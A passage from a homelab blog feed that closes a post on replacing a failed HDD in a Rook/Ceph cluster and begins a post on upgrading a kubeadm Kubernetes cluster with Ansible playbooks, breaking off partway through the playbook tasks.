<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush set-device-class hdd osd.0
</span></span></code></pre></div><p>Another problem was that for some reason, the Rook operator was still trying to
re-create OSD 7, the one from the broken HDD. This was the same symptom as I had
during my k8s migration of the Ceph cluster, and I had to do the same song and dance
to clean up the removed OSD. See <a href="https://blog.mei-home.net/posts/k8s-migration-23-baremetal-ceph-shutdown/#arrogance">here</a>.</p>
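<p>From memory, and glossing over the details covered in the linked post, that
cleanup boils down roughly to removing the leftover Deployment and purging the
dead OSD from the Ceph cluster itself:</p>
<pre tabindex="0"><code># Remove the leftover Kubernetes Deployment of the dead OSD
kubectl -n rook-ceph delete deployment rook-ceph-osd-7

# Make sure the OSD is also gone from the CRUSH map and the cluster
ceph osd purge 7 --yes-i-really-mean-it
</code></pre>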
<p>To improve performance during the backfill to the new disk, I tweaked some Ceph
configs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config set osd osd_mclock_profile high_recovery_ops
</span></span><span style="display:flex;"><span>ceph config set osd osd_mclock_override_recovery_settings true
</span></span><span style="display:flex;"><span>ceph config set osd osd_max_backfills <span style="color:#ae81ff">6</span>
</span></span></code></pre></div><p>The first line instructs Ceph to prioritize recovery ops higher, the second allows
me to override scheduler settings and the third sets the maximum number of
backfilling PGs per OSD to 6.
Specifically the last option increased recovery throughput from ~11 MB/s to ~50 MB/s.</p>
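<p>These overrides are nothing I&rsquo;d want to keep around permanently, so once the
backfill is done they can be reset to their defaults again:</p>
<pre tabindex="0"><code># Back to the default mclock behaviour once recovery has finished
ceph config rm osd osd_mclock_profile
ceph config rm osd osd_max_backfills
ceph config rm osd osd_mclock_override_recovery_settings
</code></pre>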
<p>And I don&rsquo;t like it. I had to do the same during the aforementioned migration
of the Ceph cluster to k8s. And I don&rsquo;t understand why. My cluster has an average
throughput below 10 MB/s. Why does it need a manual intervention from me to get
Ceph to use the remaining IO for the backfills? It just doesn&rsquo;t make any sense
to me. I must be doing something wrong, but I have no idea what that might be.
As I said in my post about the k8s migration, I will have to really dig into
Ceph&rsquo;s implementation at some point.</p>
<p>Let me also show you the timeline of the replacement, using the Ceph PG states
over time:</p>
<figure>
    <img loading="lazy" src="pg-states.png"
         alt="A screenshot of a Grafana time series visualization. It shows the different PG states and the number of PGs in the cluster currently in that state. The time range goes from 2025-09-20 09:00 to 2025-09-22 02:25. The cluster starts out with all 265 PGs in clean state. Then, around 10:15 on 2025-09-20, the number of clean PGs drops to 202, with 63 PGs degraded, undersized and remapped. Those counts then slowly decrease until reaching 44 PGs undersized&#43;remapped&#43;degraded around 20:58 on the same day. At that time, the counts suddenly go up to 121 degraded, 146 undersized and 42 remapped. That state only remains for about 30 minutes though, after which the values drop back to 38 degraded&#43;undersized&#43;remapped. Then the remapped value only increases to 78 PGs at 21:57, about twenty minutes after all values went back down again. After this, all values consistently decrease. At about 07:12 on 2025-09-21, the number of undersized PGs goes down to zero. The last remapped PG then vanishes at around 00:15 on the next day, after which the cluster is again clean for all 265 PGs."/> <figcaption>
            <p>State of the 265 PGs during the HDD switch</p>
        </figcaption>
</figure>

<p>At around 10:15 on 2025-09-20, I launched the replacement of the OSD, still thinking
I would wait for the rebalance to finish before taking out the old HDD. That
triggered 63 of the 265 PGs to go into undersized+remapped state, waiting to be
put onto a different OSD. That operation slowly continued for the next couple
of hours, until I realized that I didn&rsquo;t have enough space to store all the data
on the two remaining HDDs. I then decided to switch out the HDD around 21:00 on
the 20th. That required me to shut down the Ceph node, also making the PGs from
the SSD in that node unavailable, leading to the spike in undersized+remapped
PGs around that time. Once I booted the node up again, there were still more
remapped PGs than before. That&rsquo;s due to the fact that I replaced a 4 TB HDD with
an 8 TB one, leading Ceph to remap additional PGs to that larger disk.</p>
<p>The danger zone, meaning the time with reduced data redundancy, lasted from 10:15
on the 20th to 07:12 on the 21st, when the last undersized PG was backfilled.
Everything after that was just the rebalancing due to the additional space on the
new HDD. I could have kept the danger time a lot shorter if I had just switched
out the HDD right away, instead of waiting for a rebalance I ultimately had
to forego anyway.</p>
<p>One last thing to mention is the change in available space in the Ceph cluster.
I replaced a 4 TB HDD with an 8 TB one, so how much more space did that net me?
Due to the way Ceph works and the fact that I would need some space for Ceph
metadata on the device itself, I wouldn&rsquo;t get an additional 4 TB.</p>
<p>As an example, let&rsquo;s look at my S3 bucket data pool, which is entirely HDD based.
With three 4 TB HDDs, I had about 1.13 TiB free in that pool at the time I removed
the broken HDD. When the rebalance was done after the replacement, that same pool
had 2.46 TiB free. So I gained about 1.33 TiB from a 4 TB disk space increase. I don&rsquo;t think
that&rsquo;s too surprising, considering that the pool is a 2x replica pool, with a
&ldquo;host&rdquo; failure domain. That means each piece of data has to be available on two
hosts in the cluster. And two of my hosts still only have 4 TB HDDs, so the
8 TB of the new HDD can&rsquo;t be fully utilized: there simply isn&rsquo;t enough
matching space on the other hosts to hold the second replica.</p>
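<p>If you want to check those numbers on your own cluster, <code>ceph df</code> shows the
per-pool free space figures like the ones above, and the pool&rsquo;s replica count can be
read directly. A short sketch, assuming a working admin shell (e.g. the Rook toolbox);
<code>POOLNAME</code> is a placeholder:</p>
<pre tabindex="0"><code># raw capacity plus per-pool usage and MAX AVAIL
ceph df detail

# replica size of a given pool
ceph osd pool get POOLNAME size
</code></pre>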
<p>Finally, I&rsquo;ve also bought a WD Red Plus 8 TB 5400 RPM HDD to have a replacement
should another HDD fail. And that might happen sooner rather than later, as I&rsquo;ve
got another 4 TB HDD of the same make and model, bought at the same time from
the same shop as the failed HDD. So that one might fail soon as well.</p>
<p>This action has yet again shown that I need to take a deep dive into Ceph performance
behavior at some point.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Updating my Kubeadm k8s Cluster from 1.30 to 1.33</title>
      <link>https://blog.mei-home.net/posts/kubernetes-cluster-update/</link>
      <pubDate>Sun, 21 Sep 2025 23:30:40 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/kubernetes-cluster-update/</guid>
      <description>Using Ansible to update my kubeadm k8s cluster from 1.30 to 1.33</description>
      <content:encoded><![CDATA[<p>Wherein I talk about updating my kubeadm Kubernetes cluster from 1.30 to 1.33
using Ansible.</p>
<p>I&rsquo;ve been a bit lax on my Kubernetes cluster updates, and I was still running
Kubernetes v1.30. I&rsquo;m also currently on a trip to fix a number of the smaller
tasks in my Homelab, paying down a bit of technical debt before tackling the
next big projects.</p>
<p>I already did one update, from my initial Kubernetes 1.29 to 1.30 in the past,
using an Ansible playbook I wrote to codify the kubeadm upgrade procedure. But
I never wrote a proper post about it, which I&rsquo;m now rectifying.</p>
<p>There were no really big problems - my cluster stayed up the entire time. But
there were issues in all three of the updates which might be of interest to
at least someone.</p>
<h2 id="the-kubeadm-cluster-update-procedure-and-version-skew">The kubeadm cluster update procedure and version skew</h2>
<p>The update of a kubeadm cluster is relatively straightforward, but it does
require some manual kubeadm actions directly on each node. The documentation
can be found <a href="https://kubernetes.io/docs/tasks/administer-cluster/kubeadm/kubeadm-upgrade/">here</a>.</p>
<p>Please note: Those instructions are versioned, and may change in the future
compared to what I&rsquo;m describing here. Please make sure you&rsquo;re reading the
instructions pertinent to the version you&rsquo;re currently running.</p>
<p>The first thing to do is to read the release notes. These are very nicely prepared
by the Kubernetes team <a href="https://github.com/kubernetes/kubernetes/tree/master/CHANGELOG">here</a>,
sorted by release.
And I approve of them wholeheartedly. I&rsquo;ve been known to rant a bit about release
engineering and release notes, but there&rsquo;s nothing to complain about when it comes
to Kubernetes. Besides perhaps their length, but that&rsquo;s to be expected in a
project of Kubernetes&rsquo; size.</p>
<p>I did not find anything relevant or interesting to me directly in any of the
releases, so I won&rsquo;t go into detail about the changes.</p>
<p>One thing to note, which will bite me later, is the <a href="https://kubernetes.io/releases/version-skew-policy/">version skew policy</a>.
It describes the allowed skew between versions, most importantly between the
kubelet and the kube-apiserver said kubelet is talking to. Namely, the versions
between the two can skew at most by a single minor version, and the kubelet must
not be newer than the kube-apiserver. Meaning the kube-apiserver always needs to
be updated first. More on this later, when I stumble over this policy.</p>
<p>Here is a short step-by-step of the kubeadm update process, always starting with
the control plane nodes:</p>
<ol>
<li>Update kubeadm to the new Kubernetes version</li>
<li>On the very first CP node, run <code>kubeadm upgrade apply v1.31.11</code>, for example</li>
<li>Then, update kubeadm on the other CP nodes and run <code>kubeadm upgrade node</code></li>
<li>Only after point 3) is completed on all nodes, update the kubelet as well</li>
</ol>
<p>Steps 3 and 4 are then repeated for all non-CP nodes as well. The order of steps
3 and 4 is important. <code>kubeadm upgrade</code> needs to be run on all CP nodes before
any kubelet is updated. Or at least, that&rsquo;s true on a High Availability cluster,
where the kube-apiservers are sitting behind a virtual IP. That&rsquo;s because of
the version skew policy I mentioned above: The kubelet must never be newer than
the kube-apiserver it is talking to. Which makes some sense: The Kubernetes API
is the public API, with stability guarantees, backwards compatibility and such.
So it will likely be able to serve older kubelets just fine, as it will still
support the older APIs that kubelet depends on. But in the other direction, the
newer kubelet may access APIs which older kube-apiservers simply don&rsquo;t serve
yet.</p>
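<p>Condensed into shell form, the procedure looks roughly like this. This is just a
sketch following the kubeadm documentation; the version number and NODENAME are
placeholders, and if you pin the packages like I do, they need an apt-mark unhold
first:</p>
<pre tabindex="0"><code># on the first control plane node
apt-get install -y kubeadm=1.31.11-*
kubeadm upgrade plan
kubeadm upgrade apply v1.31.11

# on every other control plane node (and later on the workers)
apt-get install -y kubeadm=1.31.11-*
kubeadm upgrade node

# only once all control plane nodes are upgraded: kubelet, one node at a time
kubectl drain NODENAME --ignore-daemonsets
apt-get install -y kubelet=1.31.11-* kubectl=1.31.11-*
systemctl daemon-reload
systemctl restart kubelet
kubectl uncordon NODENAME
</code></pre>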
<h2 id="my-cluster-update-ansible-playbook">My cluster update Ansible playbook</h2>
<p>As I tend to do, I created an Ansible playbook during the first update, so that
I could do something else while the update runs fully automated. That did not work for any of the
updates this time around, but I will go into more detail later.</p>
<p>Let&rsquo;s start with the fact that I&rsquo;m using Ubuntu Linux as my OS on all of my
Homelab hosts, and I&rsquo;m getting the Kubernetes components from the official
apt repos provided by the Kubernetes project.
I&rsquo;m also using <a href="https://cri-o.io/">cri-o</a> as my container runtime. Until recently,
that was also hosted in the <a href="https://k8s.io">k8s.io</a> repos, but has since moved
to the <a href="https://www.opensuse.org/">openSUSE</a> repos.</p>
<p>Before starting the first tasks, here is my <code>group_vars/all.yml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">crio_version_prev</span>: <span style="color:#ae81ff">v1.30</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kube_version_prev</span>: <span style="color:#ae81ff">v1.30</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kube_version</span>: <span style="color:#ae81ff">v1.31</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kube_version_full</span>: <span style="color:#ae81ff">1.31.11</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">crio_version</span>: <span style="color:#ae81ff">v1.31</span>
</span></span></code></pre></div><p>I&rsquo;ve stored the versions here, instead of the <code>defaults/main.yml</code> of the role
because I also use the versions in a few other places, mainly my deployment
roles for configuring new cluster nodes.</p>
<p>But enough prelude, here are the first few tasks from the <code>tasks/main.yml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update kubernetes repo key</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#ae81ff">kubernetes-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/usr/share/keyrings/kubernetes.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0644</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove old kubernetes deb repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/kubernetes.gpg]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://pkgs.k8s.io/core:/stable:/{{ kube_version_prev }}/deb/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39;</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add kubernetes ubuntu repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/kubernetes.gpg]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://pkgs.k8s.io/core:/stable:/{{ kube_version }}/deb/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39;</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update apt after kubernetes repos changed</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span></code></pre></div><p>These deploy the apt key of the <code>K8s.io</code> repo for the main Kubernetes components,
remove the repo of the previous version and add the repo of the new version.
Finally, an apt cache update is executed to fetch the package lists from the new repo
before running any install tasks.</p>
<p>One thing to note here is that I&rsquo;m manually fetching the Kubernetes repo key
and storing it in my Ansible repository via this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.31/deb/Release.key | gpg --dearmor -o roles/kube-common/files/kubernetes-keyring.gpg
</span></span></code></pre></div><p>The next step is updating the kubeadm version:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unpin kubeadm version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeadm</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">install</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update kubeadm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;kubeadm={{ kube_version_full }}*&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubeadm version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeadm</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_kubeadm</span>
</span></span></code></pre></div><p>The <code>update_kubeadm</code> variable exists because I&rsquo;m running this role twice for the control plane nodes:
once updating only kubeadm on all CP nodes, and then again to run the kubelet
update. That second run doesn&rsquo;t need to repeat the kubeadm update, so the
variable lets me switch those tasks off.</p>
<p>Next is the <code>kubeadm upgrade</code> invocation, the main part of the cluster update:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run kubeadm update</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cmd</span>: <span style="color:#e6db74">&#34;kubeadm upgrade node&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">not kube_first_node and update_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run kubeadm update</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cmd</span>: <span style="color:#e6db74">&#34;kubeadm upgrade apply -y v{{ kube_version_full }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">kube_first_node and update_kubeadm</span>
</span></span></code></pre></div><p>There are two variants of this task, depending on whether <code>kube_first_node</code> is
set or not. This is necessary because only the first CP node updated needs to
run <code>upgrade apply -y v&lt;NEW_VERSION&gt;</code>. All other CP nodes and all non-CP nodes
just run <code>upgrade node</code>. Again, this setup using variables is mostly because
<em>in principle</em>, the update steps are the same for all nodes in the cluster. So
it made more sense to have one role where I could switch some tasks on/off, rather
than having multiple roles which each repeat a lot of their respective tasks.
The kubeadm update includes updating the control plane components: kube-apiserver,
kube-controller-manager and kube-scheduler as well as etcd. All of these are
static Pods, whose definitions are controlled by kubeadm.</p>
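<p>To verify what kubeadm has actually done after this step, the static Pod manifests
it manages can be inspected on the node, and the running control plane version can be
read from the cluster. A small sketch; the label selector is the one kubeadm puts on
its static Pods:</p>
<pre tabindex="0"><code># manifests written by kubeadm on each control plane node
ls /etc/kubernetes/manifests/

# image (and therefore version) of the kube-apiserver Pods
kubectl -n kube-system get pods -l component=kube-apiserver \
    -o custom-columns=NAME:.metadata.name,IMAGE:.spec.containers[0].image
</code></pre>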
<p>The next step is updating the kubelet and kubectl on the nodes, which is
preceded by draining the node:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span></code></pre></div><p>Here is the second variable I&rsquo;m using to restrict which tasks of the role are
executed for a particular host, the <code>update_non_kubeadm</code> variable. It indicates
that all tasks not related to the kubeadm update are to be executed.
This command is not issued on the node itself, but rather on my command and
control host, which also runs the Ansible playbook.</p>
<p>Then comes the update of cri-o:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove previous kube cri-o repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/libcontainers-crio-keyring.gpg]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://download.opensuse.org/repositories/isv:/cri-o:/stable:/{{ crio_version_prev }}/deb/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">libcontainers-crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39; and update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add libcontainers cri-o repo key</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#ae81ff">libcontainers-crio-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/usr/share/keyrings/libcontainers-crio-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0644</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add kube cri-o repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/libcontainers-crio-keyring.gpg]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://download.opensuse.org/repositories/isv:/cri-o:/stable:/{{ crio_version }}/deb/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">libcontainers-crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39; and update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update apt after cri-o repos changed</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update cri-o</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">cri-o</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">cri-tools</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">autostart cri-o</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd_service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span></code></pre></div><p>This is similar to the initial Kubernetes repo setup. Please note that from
version 1.30 to 1.32, cri-o lived in the k8s.io repos, but was then moved to
openSUSE repos.</p>
<p>Once cri-o is updated, the last part of the role is updating kubectl and kubelet:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unpin kubelet version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">install</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update kubelet</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;kubelet={{ kube_version_full }}*&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubelet version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unpin kubectl version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">install</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update kubectl</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
